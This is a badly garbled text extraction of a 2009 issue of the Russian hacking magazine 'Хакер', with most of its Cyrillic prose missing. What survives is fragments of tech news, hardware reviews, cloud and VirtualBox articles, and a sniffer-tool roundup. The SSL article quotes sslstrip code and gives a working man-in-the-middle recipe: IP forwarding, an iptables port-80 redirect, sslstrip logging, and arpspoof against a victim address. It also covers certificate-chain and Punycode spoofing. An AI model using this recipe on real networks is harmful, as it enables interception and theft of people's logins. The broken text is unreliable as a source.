Хакер 2009 05 PDF

: 6
. 50
x 05()2009
w w w.xakep.ru
05 (125) 2009
SLL/
144
WINDOWS 7

125
. 120
12

. 36
BSD
OPENBSD
4.5 NETBSD 5.0
. 84
, . z
:
144 , , ,
:).

.
-
.
SSL-, Black Hat
. :
vmware :).
nikitoz, . .
CONTENT
05(125)
004 MEGANEWS
FERRUM
016
090
096
PC_ZONE
022
026
032
036

Cloud Computing
SSL
050
056
060
066
072
EASY-HACK

iPhone-

WORDPRESS
0DAY

E-Gold
084

GNU/Linux
BSD
OpenBSD 4.5 NetBSD 5.0

, 4: MULTIPLAYER

!
-
SYN/ACK
120
124
128
X-TOOLS

Python
UART
078
114
074
110
044
106
VirtualBox
040
100
134

WINDOWS SE7EN
Windows 7 IT-
Citrix XenServer:

FreeBSD-

Cisco
140
143
144
FAQ UNITED
FAQ
8,5
WWW2
web-
022
EPROCESS
EPROCESS
EPROCESS
KPROCESS
KPROCESS
KPROCESS
LIST_ENTRY {
LIST_ENTRY {
LIST_ENTRY {
FLINK
FLINK
FLINK
BLINK )
BLINK )
BLINK )
106
026
096
032
/
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

>

>
(strekneva@gameland.ru)
>

> -

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2009
>> meganews
J3
PC27
PC27
J3
MIFRILL / MIFRILL@R EAL.XAKEP.RU /
Crysis

, ,

, ? ,
,
!
,
, . OnLive

,

. ,
,
,
-. ,
OnLive.
,
, .
,
: SD 1.5Mbps,
HD (1280p) 5Mbps.
, OnLive
.
.
, ,
OnLive
Electronic Arts,
Eidos, Atari, WarnerBros
.
.

( www.onlive.com
).
2009
.
,
Europeana

(World
Digital Library)
21- .
2005

,
,
.

, ,

.
, , ,
004
, , , ,
.
!
,
. -,
, . www.
wdl.org

.
,
IT, Google Microsoft.
WDL 3 . ,
.
7.4 . 6.9 .
,
.
X 05 /125/ 09
>> meganews
PC27
PC27
Blu-ray .
,
. , Pioneer BDR2203, Blu-ray, DVD CD.
SATA.
BD-R 8, 50
.
CyberLink. -
. 250 ,
.
FACEBOOK
1.
7-
5.6 !
!
, IBM, ,
Sun Microsystems.
Sun 7 .
. , ,
, , Sun
, 25%. , ,
Oracle, .
Sun 9.5 .
. , Sun , .
,
5.6 (
7.4 .). , ,
006
Twitter
. twitter- ,
, . 17 ,
2 100.000 (aka -).
505.985
. ,
Twitter 24%. ,
.
www.twitter.com/Oprah.
. , 2008 - kremlin.ru.
- ( ,
). LiveJournal
.
http://community.livejournal.com/blog_medvedev. ,
, .
5.5 ,
www.blog.kremlin.ru.
. Oracle , , Java Sun

!
X 05 /125/ 09
>> meganews
PC27
Radeon

AMD

3D- $260
(ATI Radeon HD 4890), TUL

GPU. , PowerColor LCS
HD4890,
PowerColor Liquid
Cooling Solution ( ,
).

J3

3D, ( 20

). ,
H2O,
GPU ,
900 1000
(4000 ), .
1 (GDDR5).
,
PowerColor LCS HD4890
260, $339.

THEPIRATEBAY.ORG
$243
,
.

,
, -
YouTube ,
. www.youtube.
com/edu -
. MIT,
, ,
. , ,
.

, , !
,
, ,
.
Google,
:
,
Google ,
-.

Google Maps ,
. ,
.
,
Google Street
View ,
, ,
008
,
,
. , -
,
.
, , , 1.5

.
Google Maps , ,
.
X 05 /125/ 09
>> meganews
17-
The Pirate Bay (
). ,
, .
,
,
. , ,
,
. ,
. TPB , -
3.620.000 , ( $905
). ,
13 . .
, . - .
,

(SFU),
(SFIR) Stiftelsen.SE (The Internet Infrastructure Foundation).
,
,
. TPB : , .

. The Pirate Bay ,
, . ,
24 , . , ,
. ThePirateBay.org,
TPB-, BitTorrent .
X 05 /125/ 09
410 /.
7000 /.
>> meganews
YouTube
Google
.

YouTube. YouTube

, , -
,
.
Google
, YouTube

(pay-per-view),

. ,
.

. , ,
, YouTube Google
$753 . ,
3.5 ,

. Google

YouTube ,
2006 .
, Sony ,
,
YouTube - .
2008 INTEL
81.8%
!
Skype

eBay 2005 .
,

3.1 . ,
,
Skype .
New York Times
, Skype
,
,
. ,
eBay.

, ,

$1.7 .

Joltid,
Skype,
,
eBay .

, 1-
eBay .
, , , , eBay

Skype, Joltid
,
.
bash.org.
ru , ,
1.5
, .
,

DDoS- .
,
-2.
010
,
, ,
, ,

(tnt-tv.ru),
TNT (tnt.ru). ,
,
,

. , -

(http://tnt.
ru
)

. IP-
TNT ,
,
,
.
X 05 /125/ 09
>> meganews

Eizo Nanao
,
EcoView.
EcoView ,
120 .

X 05 /125/ 09
, ,
, .
FlexScan EV2023W-H
20- VA- 1600x900
, FlexScan EV2303W-T
23- TN- -
1920x1080 .

, .
,
225 , , Eizo Nanao,
.
,
18
25 ,
0.7 .
385 460
.
11
>> meganews
PC27
10
Google , ,
TinEye (similar-images.googlelabs.com).
, TinEye,
, . Google
,
.
Google , .
Similar images ,
. ,
,
tineye.com, !
TELEGEOGRAPHY , SKYPE

41%, 8%

Apple .
Mac, ,
, 20.000 .
Apple
iWork09 Adobe
Photoshop CS4.
OSX.
Iservice. , Mac , ( ) iBotnet.

DDoS- .
012
X 05 /125/ 09
>> meganews
Dr.Web
AV-Desk

-
Dr.Web AV-Desk. -
. , ,
,
, . Dr.Web AV-Desk
,
, , - , , ,
.
Dr.Web
5.0 , ,

( ).
,
(Dr.Web , Dr.Web
Dr.Web ); Dr.Web AV-Desk ,
;

,
. FreeBSD 7.1, Fedora
Core 10 Glibc 2.9.
, MICROSOFT

35%,
, , . , ,
X 05 /125/ 09

Joint Strike Fighter?

, ,
300 . .
,
, ,
,
. ,
, ,
,
. , ,
,
, -
?
013
>> meganews
PC27
ReMIX 2009

- ReMIX.
, ReMIX
, ,
300 (
1.500).
ReMIX .

Microsoft (,
MIX 09, -, ).

Silverlight IE 8,
IE 8 Mail.Ru
RuTube Silverlight.
Windows Server Windows Azure,
.
-,
, Twitter.
steveb@microsoft.com; IE 8
; ,
Warcraft;

, ; , Microsoft
300 . .

www.remix.ru.
Flash
Flash
, . Adobe,
, ,

. Adobe ,
, .
NAB Show
Flash, , Bluray . ,
,
.
Broadcom, Intel STMicroelectronics,
Comcast,
Disney Interactive New York Times.
,
Flash,
.
open Framework,

Flash-, .

HP
Mini. HP Mini 2140. Intel
Atom 1.6 .
,
10.1- HP Illumilite LED
( 16:9)
.
,
.
,
, , .
(92%)

HP DuraKeys,
Mini
2140 3-
.

.
Wi-Fi Certified WLAN,
Bluetooth 2.0
- VGA.
Mini 2140 15.800 .
,
.
Last.fm .
,

.

. , Last.fm
.
014
, ,
.
30 ,
. Last.
fm 3 ,
PayPal.
,
, ,
, . ., . , ,
, .
X 05 /125/ 09
>> meganews
!

International Collegiate Programming Contest
(ICPC 2009) .
, 3 4
.
ICPC 100
X 05 /125/ 09
,
7109 - 1838 .
-
,
, -
,
.

:).
11 .
9- , , , 9 .
015
>> ferrum
1

, .
, , ,
1 ,
.
, .
,
.

. .
,

. ,
,
1 1000 ,
, 1 = 1024 . ,
,
. , 24 .

.
-

,
. ,

1020 .

.
, , ,
. ,

.
Lavalys Everest Ultimate Edition

4.60. , .
,
. ,
,
.
,
.
,
45 ,

.
,
, ,
,
Hitachi DeskStar HD721010KLA330

Seagate ST31000340AS
Samsung HE103UJ
Western Digital WD10EADS Caviar Green
Western Digital WD1001FALS Caviar Black
, : 2200, AMD Athlon 64 3500+ (Socket 939)

: Albatron K8SLI
, : 2512, Corsair Value Select DDR400
: ASUS EAX1900XTX
, : 80, Seagate Barracuda 7200 rpm, IDE
, : 450, Floston
016
X 05 /125/ 09
>> ferrum
,
Samsung HE103UJ
Western Digital WD1001FALS
Caviar Black
Western Digital WD10EADS
Caviar Green
000
5200 .
10
12
14
16
WD
4700 .
, ,
,
Hitachi DeskStar
HD721010KLA330
Seagate
ST31000340AS
, : 1000
: SATA 300
: 200
, /: 7200
, : 32
: 5
: 10
NCQ:
, : 0,7
, : 1000
: SATA 300
: 250
, /: 7200
, : 32
: 4
: 8
NCQ:
, : 0,64
IBM
Hitachi. :
.
5 200 .
IBM. ,
, .
.
.
,
.
Seagate.
.
4 250 .
. ( ) .
: ,
. ( ).
, , , .
X 05 /125/ 09
017
>> ferrum

Samsung HE103UJ
Samsung HE103UJ

Caviar Black
Caviar Green

Caviar Black
Caviar Green
000
0
/
50
100
150
200
250
20
30
40
50
60
Samsung HE103UJ
6500 .
, : 1500
: SATA 300
: 375
, /: 7200
200
, : 32
: 4
: 8
NCQ:
, : 0,68
.
2
Seagate 1,5 .
500, 750 1000 , ,
. ,
NAS-.
48 . ,
!
,
:).
018
0
10
.
Seagate
ST31500341AS
:
:
000
:
, : 1000
: SATA 300
: 334
, /: 7200
, : 32
: 3
: 6
NCQ:
, : 0,64
6500 .
,

, .
. RAID-,
.
160 1000
, . ,
, 1,2 . .
!
, .
X 05 /125/ 09
>> ferrum
/.
write
read
WD1001FALS Caviar Black

:
Samsung HE103UJ
Caviar Black
Caviar Green
0
/
000
Western Digital
20
40
60
80
100
120

SEAGATE

Caviar Green
, : 1000
: SATA 300
, : 334
, /: 7200
, : 32
: 3
: 6
NCQ:
, : 0,69
4600 .
:
:
, : 1000
: SATA 300
, : 334
, /: 7200
, : 32
: 3
: 6
NCQ:
, : 0,68
4400 .

: , .
, . ,
.
,
.
, .

?
X 05 /125/ 09

, WD .
1 .
,
, : , NoTouch,
. , .
,
.
.
.
, Seagate ST31500341AS
.
,
,
Caviar Green. z
019
>> ferrum
ASUS AiGuru S2

3300 .
: Skype-
: 128128 ,
: IEEE 802.11 b/g
: 3 . ( ), 25 . ( )
: 0,5
: 116 x 47 x 12.3
: 72

Skype, , ,
.
, Skype- ASUS
.
AiGuru S2 Skype- ASUS.
,
.
USB.
-.
USB- .

,
. ,
WiFi
.

(
)
Wi-Fi .

-, ,
, WiFi- .
, ASUS
020
AiGuru S2 4-
.
Skype-
. ,
AiGuru S2
Skype-.

.
-,
,
.

. Windows Media
iTunes.
,
AiGuru
S2 ,
, , .

. ,
USB
.
, ASUS AiGuru S2
,
Skype-.

.
X 05 /125/ 09
CLOUD
COMPUTING
CLOUD
COMPUTING
>> pc_zone
CLOUD
COMPUTING

/ ALEX.RAIDEN@GMAIL.COM /
CLOUD
COMPUTING
CLOUD
COMPUTING
CLOUD
COMPUTING
Cloud Computing

, ,
? ?
,
(. Cloud computing)
,

-.
,
, (
).
,
. .
.
?
Cloud Computing
. . , , ,
,
( ,
).
. , ,
(, ,
).

;

022
, . : Cloud Computing
. 60-
.
Cloud Computing . ,
.

, ,
,
.

5 HTTP
REST API. , , ,
RAID . .
, ,
.
,
. -,
,
.
,
.
, ,
API .
-
REST,

http-. ,
, ,
.
?
. , -,
.
Uptime , ,
-
(99.9% ),
.
,

API.

!
,

.
.

(
), .
,
X 05 /125/ 09
CLOUD
COMPUTING
D
NG
CLOUD
COMPUTING
CLOUD
COMPUTING
ENOMALY

CLOUD
,

. Cloud Computing
,
: .
SAAS, PAAS
, !

. , Cloud Computing,
aaS (aaS A, ,
!). as
a Service, ,
.
SaaS (Software-aaS),
, - ,
, ,
. ,
Exchange- ,
. .
, .
? Google Docs?
SaaS, .
PaaS (Platform-aaS) SaaS, , .
,
,
.
Google AppEngine.
, PaaS
,
.
HaaS (Hardware-aaS) ,

.
. ,
,
,
( , -
CPU, ).
IaaS (Infrastructure-aaS) , HaaS,
.
,
,
.
aaS (Communication-aaS) X 05 /125/ 09
>> pc_zone
, (
Xen VMware),
CLOUD
COMPUTING
, .

,
,

CLOUD
. COMPUTING
Amazon EC2,

. , , ,
GOOGLE APPENGINE

-
. PYTHON/JAVA

CLOUD ),
(
COMPUTING
,

; IP-,
. 12
,
(, IM).

.
?
( ,
,
Mosso.com),

, , , .
, ,
. Apatana Cloud,
, .
IDE, Stax.

net , Java-, Engine Yard,
. ,
Ruby.
()
web-OS
,

,
, .

VDS/VPS ,
(SaaS-) , ,
Cloud. ,
, VDS (Virtual Dedicated server)
, ,
: . ,
,
,
! ,
AJAX- Flash.
.
Cloudo (www.cloudo.com), eyeOS

(eyeos.org, OpenSource)
, .
Jooce (jooce.com).
,

,

.

Cloud-
,
,
, API.
,
(
). ,
.
,

,

( , ),
.
; ,
.
: ,
, API , ,
. , , , VDS,
? ! ,

. IT. :

; ,
API, ,
.
.

- , -
023
CLOUD
COMPUTING
>> pc_zone
INFO
info

Java, GridGain (www.
gridgain.com).

, .

: Java, Python,
JavaScript, Ruby, C# ,

,
JVM.
HTTP://WWW
links
25 -:
http://habrahabr.ru/
blogs/os/10952
.
,
- ,
, . .
SQL- ( ,
Oracle DB2). , ,
.
key-value Google
BigTable, .

, , , ,
.
, ,
SQL .
, , map/reduce .

,
.
, ,
PHP MySQL!
AMAZON GOOGLE
DVD
CLOUD
MPUTING
dvd
EUCALYPTUS
c eucalyptus.
cs.ucsb.edu
.

eyeOS.
CLOUD
COMPUTING
CLOUD
COMPUTING
024

,

, .
,
!

- .
, ,
, (:
) .
,
,
.
cloud- Amazon- , ,
, .
Google AppEngine,
,
API .
Python Java,
,
(,
! ,

, 5
; ). ,
CLOUD
.
COMPUTING
,
,
(
). , Microsoft Azure.
Windows Server 2008; , ,
.NET Runtime, SQL
Service, Live, SharePoint, Dynamics CRM.

API, HTTP, REST, SOAP.
cloud -, . ,
.
Amazon
.
, , ,
Twitter
Amazon EC2. ,
Elastic Compute Cloud,
. ,
( , , ),
.
, , ()
IP-.
Amazon
Web Services , EC2:
SimpleDB
SQL- ;
Simple Storage Service S3
REST-API ;
CloudFront
;
Simple Queue Service
;
Elastic MapReduce Apache Hadoop.

?
, ,
. ,
, , .
, Aptana Cloud,
X 05 /125/ 09
CLOUD
COMPUTING
CLOUD
COMPUTING
>> pc_zone
CLOUD
COMPUTING
,

30

. ,
, , , Google AppEngine
Amazon EC2.
, AppEngine
( Python-),

API.
.
, ,
digg-. AppScale
, Google-.
,
, ,

. AppScale
Linux-, Xen,
Amazon EC2,
,
Eucalyptus, .
, , , 4 ,
, ,
64-.
, 4 Xen-
! ,
: http://code.google.com/p/appscale/wiki/
Deploying_AppScale_via_Xen. , ,
X 05 /125/ 09
AMAZON EC2 ,
. GOGRID
,
,
..

. ,
, Google.
, , AppScale

( ,
).
Python ,
- ,

, , Amazon EC2,
.
EUCALYPTUS,
, Elastic Utility Computing
Architecture for Linking Your Programs To Useful
Systems. ,
, ()

,
Amazon, . , API
, ,
,
. ,
AppScale Eucalyptus-,

Xen . !

,
, Enomalysm (www.enomaly.com).
, (VMware,
KVM, Xen ),
Amazon EC2
-, -.

XMPP, REST, JSON.

, :
, , .
Cloud- ,
. , ,
.
(CPU, , ) .
,
.
SLA ,
, 99,999. ,
/ !
, ,
,

( Java Python).
API,
, SQL- ,
, , ,
! , , ,
,
,
(, , ). z
025
>> pc_zone
sslstrip
rip
l st
ss

SSLSTRIP

/ ANTITSTER@GMAIL.COM /
SSL

,
, .
SSL-
.
?
: .
,
,
.
,

HTTP . HTTPS,
,
SSL
.
SSL?
SSL .
,

,
(
). ,
( : certificate
authority CA).
026
:
() ;
;
;
;
() ( );
.
.
,
(Site
Certificate).

(CA
Certificate);

( Root CA). ,
(Intermediate
CA), -
Site Certificate, ,
CA Certificate, .
,
:
CA Certificate Intermediate CA Site
Certificate, . ,

:
,

, ;
, ;
,
.

, ,
100% ,
.

, . , :
.
X 05 /125/ 09
>> pc_zone
sslsniff
rif
l st
ss
f

SSLSNIFF
SSLSNIFF,

:
xakep.ru;

Root CA Intermediate CA Intermediate
CA xakep.ru.
, , paypal.com?
(Root
CA Intermediate CA Intermediate CA
xakep.ru paypal.com)
:
;
;

.
: ?

Basic Constraints, ,

. ,
CA=FALSE. ,

. ,
,
!
,
, Moxie Marlinspike
sslsniff, MITM (Man in the
middle), .
:
HTTPS;
,
,
;
X 05 /125/ 09
HTTPS-
,
.
,
sslsniff
. , 2002-,
,

. ,
!
SSLSTRIP
, ,
. ,

Gmail. mail.google.com .
http://, https://.
,
:
/ .

http-, , ,
.

. , ,
? ,

HTTP?
sslstrip,
Black
Hat DC 2009
Moxie Marlinspike.
. ,
Python. , ,
MITM,
,
HTTP-. -

https:// http://,
URL
.
def replaceSecureLinks(self, data):
data = DataShuffler.replaceSecureLinks
(self, data)
data = self.replaceSecureCookies(data)
data = self.replaceCssLinks(data)
data = self.replaceSecureFavicon(data)
iterator = re.finditer(
self.linkExpression,
data,
re.IGNORECASE)
for match in iterator:
link = match.group(9)
if not link.startswith('http'):
logging.debug("Found relative
link in secure transmission: " + link)
absoluteLink = "http://" +
self.serverHost + link
absoluteLink = absoluteLink.replace
('&', '&')
self.secureLinkListener.
addLink(absoluteLink);
return data

URL,
, ,
,
HTTPS-,
.
,
HTTP.
. ,
,
, ,
,
027
>> pc_zone
WARNING
warning
sslsniff
Moxie Marlinspike,
-

Basic Constraints.
. ?
:).

, , favicon ( ,
).
,
, , .
def replaceSecureFavicon(self, data):
iterator = re.finditer(

.

,
.
self.iconExpression,
data, re.IGNORECASE)
for match in iterator:
link = match.group(1)
link.replace('http://', 'https://')
if not link.startswith('http://'):
link = 'http://' + self.serverHost + link
self.secureLinkListener.\
addSecureFavicon(link)
self.secureLinkListener.addLink(link)
HTTP://WWW
links
Moxie Marlinspike:
thoughtcrime.org.
sslsniff:
thoughtcrime.
org/software/sslsniff.
sslstrip:
thoughtcrime.org/
software/sslstrip.
arpspoof:
arpspoof.sourceforge.net.
IPTABLES
HTTP-
8080
return data
:
,
;
,
;
,
.
?
security bit
Set-Cookie, HTTP.
, HTML content
encodings ( ), if-modifiedsince (
, ).
. ,
. : , ,
.
(), ,
. :
BASIC CONSTRAINTS CA=FALSE
DVD
dvd

DVD-.

sslstrip.
028
X 05 /125/ 09
>> pc_zone

PAYPAL.COM

XAKEP.RU
Root CA
Intermediate
Root CA
Intermediate
Intermediate
Intermediate
Intermediate
Leaf
(xakep.ru)
Leaf
(xakep.ru)

XAKEP.RU
.
MITM-
,
, Cookies (, 5 ).
5 , ,
.
5 - , -
Leaf
(paypal.com)
, , , , , . , -, .
SSLSTRIP
. , -
Root CA
1-
CA
.
Root CA. Root CA
, . .
2-
CA
.
, CA2 CA1,
.
.
...
X 05 /125/ 09

,
CA2. .. ,

.
.
. ,
,
(192.168.1.3),
(192.168.1.5) , (192.168.1.1).
.

BackTrack3 ( ,
,
, -
?). , sslstrip:
#bt python setup.py install
, ,
sslstrip :
#bt python ./sslstrip.py -h
.
,
.
(forwarding mode).
:
#bt echo "1" > /proc/sys/net/
ipv4/ip_forward
iptables http-:
029
>> pc_zone
SSLSTRIP
,

SSLSNIFF .
, 2002-,

,

#bt iptables -t nat -A PREROUTING -p tcp
--destination-port 80 -j REDIRECT --to-port
<yourListenPort>
<yourListenPort> , sslstrip; 8080, .

sslstrip:
030
#bt sslstrip -a -l 8080 -w /root/log.txt
'-a' ,
http-, '-l' , , '-w'
-. , .
arpspoof:
arpspoof -i <yourNetworkdDevice> -t <yourTarget>
<theRoutersIpAddress>
<yourNetworkdDevice>
( eth0),
<yourTarget> ,
<theRoutersIpAddress>
#bt arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
, , ,
.
!

, SSL
,
http-.
, , , X 05 /125/ 09
>> pc_zone
SSLSTRIP
SSLSTRIP ARPSPOOF
SSLSTRIP .
,
HTTPS
HTTP

. ,
! SSL
HTTP. z
Moxie Marlinspike sslstrip tor 24

:
login.yahoo.com 114
Gmain 50
ticketmaster.com 42
rapidshare.com 14
Hotmail 13
paypal.com 9
linkedin.com 9
facebook.com 3
X 05 /125/ 09
URL
GMAIL, (
*.IJJK.CN)
sslstrip
. ,

, -.
2005- Eric Johanson
pаypal.com, a paypal.com. ?
, -, ,
. -, IDN (Internationalized Domain Names
)
Punycode xn--.
paypal.com http://xn--pypal-4ve.com.
, .com
, Punycode. , URL[S2]? : . / & ?. .
ijjk.cn *.ijjk.cn.
,
/ ? URL. sslsniff,
, https http,
URL . , https://www.gmail.com/
accounts/ServiceLogin https://www.google.com/
accounts/ServiceLogin?!f.ijjk=. Punycode
. , .
.
031
>> pc_zone
STEP
/ STEP@GLC.RU /
VIRTUALBOX
, VirtualBox
, VMware Parallels,
, , . , ,
Virtualbox . ,
Sun Tech Days, :
! :
, .

.
,
, .
,
, .
Linux
.
,
,
,
.
! ,
, ,

(snapshot). ,

,
. ,
,
x-toolz, -
032
,

.
Backtrack
Damn Vulnerable Linux,

-

. , ,
.
,

,
.
. WMware
Workstation, Parallels Workstation, Microsoft Virtual PC , , VirtualBox. -
. :
, ,
-
. -
, ,
, c VirtualBox.

15 2007 ,
Innotek, 2008 Sun Microsystems.
, ,

VirtualBox , .
,
Windows Linux,
, ,
Solaris, OpenSolaris OpenBSD.

Mac OS, ,
Intel
Hackintosh. 64-
,
,
,
. , VirtualBox ,
.
, Windows, Linux,
Solaris/OpenSolaris/MacOS X.
VirtualBox
X 05 /125/ 09
>> pc_zone
VIRTUALBOX:
4
, . , ,
:).
.
,
,
.
:
;
,
;
.
: ,
, ,
. ,

.
ISO- (

CD/DVD-),
.

,
SNAPSHOT

GUEST ADDITIONS UBUNTU
9.04,
,
.
, . VirtualBox .
, USB, USB- ,
-.

.

.
!

,
,
.

,
.
, ,
. ,
,
SUN TECH DAYS 2009

, VirtualBox,
Sun Tech Days, 8-10 . , , . ,
- , - .
, . , ,
: 45
SunStudio
NetBeans, openSolaris, JavaFx .. , Sun,
, , - Sun Microsystems, Inc.
Sun. , , .
,
, VirtualBox.
X 05 /125/ 09

:
Not attached ( );
Network Address Translation (NAT);
Bridged networking ( );
Internal networking ( );
Host-only networking (
).
,
NAT, , (
, ..).
IP- , .

, -.
: IP-,
DHCP-
, ,
, , .

,
,
. -
.
,
VirtualBox, RPD (, VRDP, VirtualBox Remote
Desktop Protocol). ,
: mstsc , ,
rdesktop. :

, , .

,
VRDP-.
-
033
>> pc_zone

RPD-
HTTP://WWW
links

VirtualBox:
www.virtualbox.org.
VB:
http://blogs.sun.
com/VirtualBoxBuzz.

VBoxManage:
skonev.blogspot.
com/2009/03/
virtualboxvboxmanage.html.
DVD
dvd
VirtualBox,
SDK

.
034
,

. ,
3389 ( ,
RDP
), 3390.
mstsc
.
, IP (
, )
, . :
, IP- !

rdesktop, :
rdesktop host_system_ip:port
, ,
.
,
.

.
, RPD-
RC4
128- , 4096
.

.
,
Host Key (
<Ctrl> ). -,
,
. ,

Guest Additions.

,
. VMware,
, .
Windows Guest Additions ,
:
UBUNTU SEAMLESS WINDOWS RPD, DEBIAN LENNY

. CD,
.
, Fedora Core, Redhat Enterprise
Linux, (open)SUSE, Ubuntu, .

DKMS (Dynamic Kernel Module Support).
Ubuntu :
sudo apt-get install dkms
VBoxGuestAdditions.iso
CD-,
:
sh ./VBoxLinuxAdditions-x86.run
, :
/etc/init.d/vboxadd setup

, .
SEAMLESS WINDOWS
Seamless windows.
? ,
,
.
.
, ,

.
.
Seamless, Host key
L
, , .
.
, Windows,
Solaris/OpenSolaris X.org 1.3.
SHARED FOLDERS
Guest Additions
Shared Folders, .
X 05 /125/ 09
>> pc_zone

VBOXMANAGE
QUAKE3
OPENGL
,
3D- COMPIZ
, ,
.

, .

.
?
, ,
( ). !
.
:
: ! , VirtualBox
GUI-. ,
,
VBoxManage.exe
.
VBoxManage list
vms
, UUID:
net use x: \\vboxsvr\sharename, x:

vboxsvr
, -
sharename ,
Linux :
mount -t vboxsf [-o OPTIONS] sharename
mountpoint
3D
, VirtualBox 3D
. ,
3D-
( )
VirtualBox ,
Windows, Linux, Mac, Solaris.
, Quake3
Compiz . .
3D-,
Guest Additions
. -
(, )
3D
OpenGl,
VirtualBox ,
. , ,
, ,
. OpenGL-, , Direct3D
.
!
,
RDP ?
X 05 /125/ 09
c:\Program Files\Sun\xVM
VirtualBox>VBoxManage.exe list vms
VirtualBox Command Line Management Interface
Version 2.2.0
(C) 20052009 Sun Microsystems, Inc.
All rights reserved.
"w7" {7f5e06fb-fee2-4984-af22-a113bf67e646}
"xp" {778f2a40-dce8-4519-97fd-9c4c0d6797c4}
"ub" {afc68d97-3883-48c1-8e1f-4fae39dc2d6c}
? , : VBoxManage.exe startvm w7.

, : ,
, .
, ,
c VirtualBox
API .
, SDK,
. ,
API,
BoxVmService (http://sourceforge.
net/projects/vboxvmservice).
VirtualBox
Windows-. ,

(
),
. , ,
, - . ,

vboxWebAdmin -.
INFO
info

.

OVF (
)

.

.

, VirtualBox

VMDK (VMware) VHD
(Microsoft Virtual PC).

. VirtualBox
,
! ,
VMware Workstation,
VB. z
035
>> pc_zone
STEP
/ STEP@GLC.RU /
-

z
-. , , , . . ,
. .
WIRESHARK
WWW.WIRESHARK.ORG
*NIX, WINDOWS

,
- Ethereal (
2006 ). Wireshark

.
,
:
,
, .

, ,
, , .
Wireshark
VoIP, IPsec, ISAKMP, Kerberos, SNMPv3,
SSL/TLS, WEP, WPA/WPA2. -
036
, gzip.
Ethernet, IEEE
802.11, PPP/HDLC, ATM, Bluetooth, USB, Token
Ring, Frame Relay, FDDI . !
,
Wireshark

.
TCPDUMP
WWW.TCPDUMP.ORG
*NIX,
WINDOWS
.
: Ethereal
(Wireshark) -,

, . ,
GUI-

, , ,
,
. ,
, ,
: , , ,

. ,
Wireshark, Tcpdump
.

.
TCPDump Libpcap/WinPcap,
nmap .
ETTERCAP
ETTERCAP.SOURCEFORGE.NET
: *NIX,
WINDOWS, MAC OS
,
ARP- (, ,
X 05 /125/ 09
>> pc_zone

WIRESHARK
),
Ettercap. man-in-the-middle. , ,
. ,

(, dns-
). ,
arpoisoning
,
ettercap. ,
:). Ettercap ,
(
),
fingerprint,
, .
0X4553-INTERCEPTER
INTERCEPTER.NERF.RU
: WINDOWS
NT(2K\XP\2K3\VISTA)

Intercepter. ! , /, .
? ,
: ICQ, IRC,
AIM, FTP, IMAP, POP3, SMTP, LDAP, BNC, SOCKS,
HTTP, NNTP, CVS, TELNET, MRA, DC++, VNC,
MYSQL, ORACLE.

.
: ICQ, AIM, JABBER,
YAHOO, MSN, GADU-GADU, IRC, MRA.
, Intercepter
,
, , ! ,

,
GTalk ( Jabber),
Mail., . 0x4553-Intercepter
X 05 /125/ 09
TCPDUMP
:
eXtreme mode.
0x4553-Intercepter

, (
).
Proxy- FTP- (
). ,
(raw) ,
,
.

pcap- ( - ) , , Wireshark. ,
offline-.

RPCAP-,
/
.
Linux xBSD, RPCAP-
.
, 0x4553Intercepter .
,
IP-.
. 0x4553-Intercepter ARP-, ,
, ,
IP-. , 0x4553-Intercepter
. DHCP DISCOVERY
DHCP-.
MAC MAC-.
ARP POISON
.
NETCAT
NETCAT.SOURCEFORGE.NET
*NIX,
WINDOWS
. TCP UDP . , Netcat
, -
ETTERCAP
,
. ,
1000 .
Netcat
TCP UDP , (

!), , DNS-,
, ,
( ),
Hex-
( ) . , Netcat
,
,
. NetCap
1995 , ,
, .
,
, ,
,
.
Socat, Netcat
SSL-, SOCKS
..
, ,
.. , Ncat, , ryptcat,
Netcat6, PNetcat, SBD .
CAIN AND ABEL

WWW.OXID.IT/CAIN.HTML
: WINDOWS
, ,
, . . ,

, . ! !
,
(, , )?
. ,
WinPcap, Cain & Abel
. ,
. ,
037
>> pc_zone
, INTERCEPTER
: , ARP-
HTTP://WWW
links

NetCat: savage.net.
au/MSWindows/html
/nc.html.

Scapy
Windows:
trac.secdev.org/
scapy/wiki/
WindowsInstallation
Guide.
DVD
dvd

x-toolz

:
DVD!
,
FTP/POP3 ,
Radius-.

VoIP- ( , SIP-)
,
. ,
ARP-.
MAC- :
( IDS). 15
Cain & Abel 25 , ,
(,
, ).
NGREP
NGREP.SOURCEFORGE.NET
: *NIX,
WINDOWS
Ngrep? grep
(, ,
, )
. ,
, . Ngrep ,
. Ngrep
IPv4/6, TCP, UDP, ICMPv4/6, IGM Ehetrnet (PPP, SLIP, FDDI, Token Ring). ngrep
,

SCAPY
038
NETCAT
HTTP, SMTP, FTP ..

(, ..)
HTTP, FTP .
NEMESIS
NEMESIS.SOURCEFORGE.NET
: *NIX, WINDOWS
,
IDS, .
, Nemesis
-.
ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP UDP.
HPING2
WWW.HPING.ORG
: *NIX, MACOS X,
WINDOWS
,
ICMP, UDP, TCP RAW-IP . ,
. Ping .

ping/traceroute, - . Hping2
traceroute IP-.
,
fingerprint . , ,
.
NETWORK MINER
NETWORKMINER.SOURCEFORGE.NET
: WINDOWS
Windows,
. Network
Miner (,
, ) ( , ,
hostname, ).
, , .. ,
. fingerprint, p0f
(lcamtuf.coredump.cx/p0f.shtm), DHCP Satori (http://myweb.cableone.net/xnih).
, Network Miner (
PCAP-) , , X 05 /125/ 09
>> pc_zone
CAIN&ABEL,
